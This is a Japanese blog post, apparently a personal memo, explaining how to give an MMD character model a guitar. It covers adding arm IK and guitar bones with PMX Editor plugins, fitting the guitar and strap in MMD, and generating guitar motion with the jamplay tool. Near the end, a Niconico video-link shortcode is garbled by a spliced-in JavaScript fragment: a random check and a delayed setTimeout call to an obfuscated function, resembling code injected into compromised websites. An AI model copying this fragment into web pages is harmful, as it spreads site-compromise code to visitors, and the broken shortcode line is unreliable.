【MMD】人物にギターを持たせる

人物にギターを持たせるで検索すると、腕IKをつけましょうというのがみつかります。
たしかに、腕IKがあったほうがその後の演奏モーションつけるのが楽になります。

ということで、いろいろ調べた結果、標準モデルと同じ構造だと腕IKをつけたりするのが
簡略化できるプラグインがあったりしたので、備忘録的にまとめておきます。


まず、ギターはアクセサリで読み込むことが前提。

手順は、以下のような感じになります。
1.PMX Editer起動
1-1.腕IKをモデルに追加
1-2.ギターボーンを追加(ギターのアクセサリをくっつける部分)

2.MMD起動
2-1.モデル読み込み
2-2.ギター読み込み
2-3.ギターをギターボーンの位置に設定

1-1と1-2を自動でやってくれるプラグインがあったので紹介という感じです。



では、具体的な話。

事前準備として、必要なファイルをダウンロードします。
配付サイトはこちら
MMD BE STUDIO
https://sites.google.com/site/mmdbes/home

ダウンロードするものは、以下の3つです。
・GuitarStrapInstallerX
・strap pmd v5 本記事作成中の最新バージョンでした
・IKMaker(PMD版もありますが、ここではPMX版を使用して説明しています)

セットアップはサイトに書いてあるので省略します。

1.PmxEditor起動
2.モデル読み込み
3.腕IK追加
ここでは、プラグインでIKMakerXで追加します。
プラグインを起動すると以下のウィンドウが表示されます。


そのまま実行ボタンをクリックするだけです。

以下のようにボーンに右腕IKと左腕IKが追加されています



4.ギターボーン追加
GuitarStrapInstallerXを使用

このプラグインだと、ギター用のストラップをつけるのも組み込まれています。
そのため、プラグインでGuitarStrapInstallerXを選択するとファイルを開くダイアログがでるのでstrap_v5.pmdを選択してください。(最新のpmdを選択)


何も変更せずにRunをクリックするだけです。



こんな感じで左肩にストラップが追加された状態になります。
(ストラップはあとでボーンの位置を変更してギターにくっつけます)




このGUMIさんの場合、25~29でギター用のボーンが追加されています。


5.MMD起動してモデルにギターを持たせる

MMD起動して、ギターのアクセサリを読み込み。
ギターを追加されたGuitarSの位置に設定したのが上記の図です。





ストラップはこんな感じで位置調整しましょう。
前の部分をギターの位置にあわせている図です。
具体的なやり方は、配布元のサイトで動画があるのでみてみると良いと思います。







ギターのストラップをある程度調整したあとの、後ろから撮ったもの。







ギター、ベース、キーボード、ドラム、ボーカルという基本構成で並べてみました。
ギターとベース以外はかなり適当です。
(ギターとベースも適当だろうといわれるかもしれないけど・・・)







ぐみさんのギター正面から。







ちょっと斜めから。



というわけで、標準的なモデルだとプラグインのおかげで簡単に設定可能というお話でした。



あとはギターモーション作成ですね。
これまた、演奏技術のない私はどうやってなんちゃってギターモーションを作るかぐぐりまくりで探してみました。

なかなか自然にならないけど、とりあえず、こんな感じ
[nicolink viandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm18583125″]
midiからギターモーションを作成するツール「jamplay」を利用しています。
両肩のモーションは削除しています。その他、腕IKの位置を適宜修正。
Gたまさんが公開しているモーションの左手の指部分をつかったりなどしています。

「jamplay」配付元サイト
AnotherT/VL
http://chaba.sakura.ne.jp/vl/

なんちゃってモーション程度の備忘録はまた気が向いた時に作ろうかと思います。













コメントを残す